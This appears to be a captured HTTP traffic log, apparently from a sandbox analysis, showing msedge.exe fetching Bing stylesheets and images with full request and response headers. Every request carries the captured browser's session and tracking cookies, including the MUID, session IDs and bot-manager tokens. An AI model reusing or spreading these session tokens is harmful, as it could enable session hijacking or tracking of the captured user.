Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 198
Content-Type: text/css; charset=utf-8
Server: Kestrel
Access-Control-Allow-Headers: *
Access-Control-Allow-Origin: *
Content-Encoding: br
Last-Modified: Sat, 02 Oct 2010 09:51:22 GMT
X-EventID: 66fe4c2fc7894219ac2e59027fcf0d34
Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
UserAgentReductionOptOut: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
X-AS-InstrumentationOptions: AppServerLoggingMaster=1
X-AS-MACHINENAME: DUBEEAP0000E20D
X-AS-SuppressSetCookie: 1
Content-Security-Policy-Report-Only: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-Zqj25qMzPKkvBgjUvliy+GQ2+2FrUsTxB2RgCTki0zI='; base-uri 'self';report-to csp-endpoint
Report-To: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
Report-To: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingrms"}]}
cross-origin-resource-policy: cross-origin
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.75}
Cache-Control: public, max-age=229304
Expires: Tue, 08 Oct 2024 07:47:13 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097667
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/uf6-405sDPw8dZxAwsFhXIwMMWQ.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/uf6-405sDPw8dZxAwsFhXIwMMWQ.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 162
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: AjOqyl59V4dyZCW/Fr/S2Q==
Last-Modified: Wed, 04 Sep 2024 10:26:19 GMT
ETag: 0x8DCCCCC04096A69
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 845a2330-d01e-0072-63f9-fe03e3000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=98134
Expires: Sun, 06 Oct 2024 19:21:03 GMT
Date: Sat, 05 Oct 2024 16:05:29 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144329.f097811
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/Ra6gRXsMm2WooMA178dYrbFLMUU.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/Ra6gRXsMm2WooMA178dYrbFLMUU.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; SRCHUSR=DOB=20241005; SRCHHPGUSR=SRCHLANG=en; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=

Response

HTTP/1.1 200 OK

Content-Length: 107
Content-Type: text/css
Content-Encoding: br
Content-MD5: bzj2pXimXA+l0+9M+nSHGw==
Last-Modified: Tue, 24 Sep 2024 06:23:57 GMT
ETag: 0x8DCDC6178B7F4BB
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 87a4982b-e01e-001b-1cd6-15c402000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=276677
Expires: Tue, 08 Oct 2024 20:56:47 GMT
Date: Sat, 05 Oct 2024 16:05:30 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144330.f0979ef
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/_ykiGO1K5rjAQeICdJheT3jfLeY.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; USRLOC=HS=1; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0

Response

HTTP/1.1 200 OK

Content-Length: 301
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: HJS5PMy7uv8AUjv1kxMX/A==
Last-Modified: Tue, 24 Sep 2024 06:38:10 GMT
ETag: 0x8DCDC637565AD96
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4b67a1ce-d01e-003a-051f-16a933000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=307884
Expires: Wed, 09 Oct 2024 05:36:57 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f097ca2
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/u-4Ai6DMrVZyhkEXANflEG9s7kY.gz.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/u-4Ai6DMrVZyhkEXANflEG9s7kY.gz.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 692
Content-Type: text/css
Content-Encoding: gzip
Content-MD5: YTtNYGz/8bkaa2hAjrT+Qw==
Last-Modified: Tue, 24 Sep 2024 07:08:01 GMT
ETag: 0x8DCDC67A0831413
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8b9d477f-601e-0067-1e91-165937000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=356695
Expires: Wed, 09 Oct 2024 19:10:28 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Vary: Accept-Encoding
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f09941a
Timing-Allow-Origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
GET

https://r.bing.com/rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/UYtUYDcn1oZlFG-YfBPz59zejYI.svg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Last-Modified: Mon, 15 Aug 2022 20:49:31 GMT
ETag: 0x8DA7EFFA703EB5F
Akamai-GRN: 0.59281102.1714799759.224b2228
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Content-Length: 964
Content-Type: image/svg+xml
Content-MD5: iOPtPdfu4TP3P/udNrBLbw==
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a81edf47-401e-0068-185a-0386c1000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=12546611
Expires: Thu, 27 Feb 2025 21:15:44 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f099554
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/GJDmKr3_TS3Qpm6KEL9UKUQKUO4.jpg HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; USRLOC=HS=1&BLOCK=TS=241005160532

Response

HTTP/1.1 200 OK

Content-Length: 6817
Content-Type: image/jpeg
Content-MD5: DEHuMbBOl4tIgtF2kPA6Og==
Last-Modified: Tue, 27 Dec 2022 02:26:51 GMT
ETag: 0x8DAE7B1D074C7E9
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c3a8dc88-201e-0068-084c-8023ba000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Akamai-GRN: 0.08071002.1723896217.7a9fd56
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingaotak"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
Cache-Control: public, no-transform, max-age=50612
Expires: Sun, 06 Oct 2024 06:09:05 GMT
Date: Sat, 05 Oct 2024 16:05:33 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
Akamai-GRN: 0.a4777b5c.1728144333.f0999f5
Timing-Allow-Origin: *
GET

https://r.bing.com/rp/r1W3Us9sqNEEDTV-z9ivBVemdOs.br.css

msedge.exe

Remote address:

92.123.128.164:443

Request

GET /rp/r1W3Us9sqNEEDTV-z9ivBVemdOs.br.css HTTP/1.1
Host: r.bing.com
Connection: keep-alive
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
DNT: 1
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
Accept: text/css,*/*;q=0.1
Sec-Fetch-Site: same-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: style
Referer: https://www.bing.com/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: MUID=05879ADD3EF86D540F588FD23FDB6C78; _EDGE_V=1; SRCHS=PC=U531; SRCHD=AF=ANAB01; SRCHUID=V=2&GUID=1AF05D2DD4AB4219A140FE95E3A457CC&dmnchg=1; ak_bmsc=74116A38A2F084E1E43A26BF6C15EE40~000000000000000000000000000000~YAAQvXd7XOYY4kqSAQAAFr1tXRm1JniIRyh/3p+xj2CC8APwbuFJl8AZ0QOdGOYWvUNf1SkjmK1S2Q6qI60vy31DuGuEYXXk94vDVI1AqG5vUmM1VoynGYvEBI4eQU9fi+7yl2iSMaFc+k5OIaZW0sxl1bRdnR5e2QKu83RdE5Dhz8jkkGRnGdxoqYjgHbBZmTaEAD5bXQOH9Xyj8fzxOuxU30Dr3CNfUHUD67ViGx/IcQ55cCFHLN5BE5l/mLItR7YuJ3FeZFbRXHhVSokcv7QBoaLDevdd77hGTLaQaFZScZeSH6YrtjorItriSkCjfEfErGAfSfISonkpitsrqfvUUHqY85wayL6FwtHVAGdsEQlIyJ0sOPdtx/aF7FE=; SRCHUSR=DOB=20241005&T=1728144325000; _C_ETH=1; _RwBf=r=0&ilt=1&ihpd=0&ispd=1&rc=3&rb=0&gb=0&rg=200&pc=0&mtu=0&rbb=0&g=0&cid=&clo=0&v=1&l=2024-10-05T07:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-10-05T16:05:32.8363002+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=; _Rwho=u=d&ts=2024-10-05; _SS=PC=U531&SID=1FD780794ED66EF4059195764FF56FEA&R=3&RB=0&GB=0&RG=200&RP=0; USRLOC=HS=1&BLOCK=TS=241005160532; SRCHHPGUSR=SRCHLANG=en&HV=1728144332&DM=0&BRW=M&BRH=S&CW=1280&CH=609&SCW=1263&SCH=498&DPR=1.0&UTC=0&PV=10.0; _EDGE_S=F=1&SID=1FD780794ED66EF4059195764FF56FEA&mkt=nl-nl; ipv6=hit=1728147938444&t=4; bm_sv=0DEC9B29819DC3ABBF8D0CF2C33AC1E4~YAAQvXd7XCEc4kqSAQAAFhluXRkP3pHPMOMJR8xpE6m40xBEGZQq9h4J17KsvtYhfIc9MmSdHop+L8bNS+ikk5gbznoaPhCHGPEZ1UD4XiyZ4hiflICrg8RdI+KbBt2Ez4Eg4mzoB9LO8ADVCgLg1G4+xyOqIe08zfgSjNHhzLE30HtXgDvuzGdF39DTkqNMffb/ktSk3iWjaL1R5ar1Hck7Xg/Lvc8poGQ0dpWICy7igeDOJD4oxSEyTdZ/AA==~1

Response

HTTP/1.1 200 OK

Content-Length: 209
Content-Type: text/css; charset=utf-8
Content-Encoding: br
Content-MD5: gWB6rXyQ1v5axVm23MC7uw==
Last-Modified: Sat, 11 Nov 2023 15:14:55 GMT
ETag: 0x8DBE2C8F605BBAC
Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 8d13624e-601e-00ac-5b88-aa1705000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
Access-Control-Allow-Origin: *
Cache-Control: public, no-transform, max-age=102697
Expires: Sun, 06 Oct 2024 20:37:26 GMT
Date: Sat, 05 Oct 2024 16:05:49 GMT
Connection: keep-alive
Alt-Svc: h3=":443"; ma=93600
